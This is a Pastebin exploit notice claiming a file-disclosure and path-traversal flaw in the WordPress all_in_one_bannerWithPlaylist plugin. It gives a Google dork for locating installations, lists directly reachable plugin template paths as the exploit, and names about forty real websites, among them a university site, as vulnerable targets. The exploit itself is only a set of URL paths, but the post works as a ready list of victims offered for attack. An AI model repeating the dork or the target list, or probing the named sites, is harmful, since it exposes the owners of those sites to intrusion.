Advertisement
KingSkrupellos

WordPress all_in_one_bannerWithPlaylist Plugins 5.0.3 Expl

Jan 14th, 2019
178
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.87 KB | None | 0 0
  1. ###########################################################################
  2.  
  3. # Exploit Title : WordPress all_in_one_bannerWithPlaylist Plugins 5.0.3 File Information Exposure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/01/2019
  7. # Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com
  8. # Software Download Link : responsivejqueryslider.com/wordpressplugin/playlist_banner.html
  9. # Software Information Link :
  10. themesinfo.com/wordpress-plugins/wordpress-all_in_one_bannerwithplaylist-plugin-dgut
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Affected Versions : 1.0 - 1.2.8 - 1.4.7 - 1.8.1 - 1.8.5 -
  14. 2.0 - 2.1.3 - 2.2.0 - 2.4 - 4.0.25 - 4.5.16 - 4.9.9 - 5.0.3
  15. # Exploit Risk : High
  16. # Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerWithPlaylist/"
  17. # Vulnerability Type : CWE-200 [ Information Exposure ]
  18. CWE-538 [ File and Directory Information Exposure ]
  19. CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]
  20.  
  21. ###########################################################################
  22.  
  23. # Impact :
  24. ********
  25.  
  26. * WordPress all_in_one_bannerWithPlaylist 5.0.3 and other versions is prone to an arbitrary file disclosure
  27.  
  28. vulnerability because it fails to properly sanitize user-supplied input.
  29.  
  30. * An attacker can exploit this vulnerability to view local files in the context of the web server process,
  31.  
  32. which may aid in launching further attacks.
  33.  
  34. * An information exposure is the intentional or unintentional disclosure
  35.  
  36. of information to an actor that is not explicitly authorized to have access to that information.
  37.  
  38. * The product stores sensitive information in files or directories that are accessible
  39.  
  40. to actors outside of the intended control sphere.
  41.  
  42. * The software uses external input to construct a pathname that is intended to identify a file or
  43.  
  44. directory that is located underneath a restricted parent directory, but the software does not
  45.  
  46. properly neutralize special elements within the pathname that can cause the pathname
  47.  
  48. to resolve to a location that is outside of the restricted directory.
  49.  
  50. ###########################################################################
  51.  
  52. # Exploit :
  53. ***********************
  54.  
  55. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  56.  
  57. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php?page=all_in_one_bannerWithPlaylist_Manage_Banners
  58.  
  59. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php
  60.  
  61. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php?page=all_in_one_bannerWithPlaylist_Playlist
  62.  
  63. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/banners.php
  64.  
  65. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/help.php
  66.  
  67. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php
  68.  
  69. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Manage_Banners
  70.  
  71. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Add_New
  72.  
  73. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Settings
  74.  
  75. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Playlist
  76.  
  77. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/overview.php?page=all_in_one_bannerWithPlaylist_Help
  78.  
  79. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/playlist.php
  80.  
  81. /wp-content/plugins/lbg_zoominoutslider/tpl/preview.html
  82.  
  83. /wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/settings_form.php
  84.  
  85. ###########################################################################
  86.  
  87. # Video Tutorials :
  88. *****************
  89.  
  90. Step 1: Installation : youtube.com/watch?v=nYp94Ri8CME
  91. Step 2: Manage Images : youtube.com/watch?v=gQezs4xWwSs
  92. Step 3: Manage Text Over Image : youtube.com/watch?v=3wR64OtLx7Q
  93. Step 4: Manage Multiple Banners : youtube.com/watch?v=3EfdmbjTvoY
  94.  
  95. ###########################################################################
  96.  
  97. # Example Vulnerable Sites :
  98. *************************
  99.  
  100. [+] lwd.org.kh/lc/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  101.  
  102. [+] copas-mpa.fr/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  103.  
  104. [+] okrls.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_playlist_record.php
  105.  
  106. [+] eagletonpoll.rutgers.edu/new-wp/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  107.  
  108. [+] fcsn.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  109.  
  110. [+] i-groupuk.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  111.  
  112. [+] princetonmanagement.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  113.  
  114. [+] looemarineconservation.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  115.  
  116. [+] liftandlube.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  117.  
  118. [+] lehmanneng.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  119.  
  120. [+] wallaces.ie/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  121.  
  122. [+] walkthewalkamerica.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  123.  
  124. [+] whoshapesourtimes.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  125.  
  126. [+] wemarket-lb.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  127.  
  128. [+] fight-club.tv/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  129.  
  130. [+] theayurway.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  131.  
  132. [+] wellingtonbridge.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  133.  
  134. [+] tuacapulco.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  135.  
  136. [+] mmojam.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  137.  
  138. [+] moebelaktion.ch/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  139.  
  140. [+] aquapools.org/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  141.  
  142. [+] huris.nl/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  143.  
  144. [+] certifiedtreeservices.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  145.  
  146. [+] park-med.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  147.  
  148. [+] llcform.us/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  149.  
  150. [+] krankas.sk/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  151.  
  152. [+] truescapemo.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  153.  
  154. [+] thereverendesquire.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  155.  
  156. [+] thebarrebelles.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  157.  
  158. [+] theaxess.net/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  159.  
  160. [+] ltsa.com.br/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  161.  
  162. [+] interkomitet.uz/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  163.  
  164. [+] avcaix.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  165.  
  166. [+] schoenphoto.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  167.  
  168. [+] yucatanbeachstand.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  169.  
  170. [+] roseumedicalcenter.com/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  171.  
  172. [+] eftportal.com.br/gilberto/homologacao/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  173.  
  174. [+] cappello.co.za/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  175.  
  176. [+] tarwada.co.ae/wp-content/plugins/all_in_one_bannerWithPlaylist/tpl/add_banner.php
  177.  
  178. ################################################################################################
  179.  
  180. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  181.  
  182. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement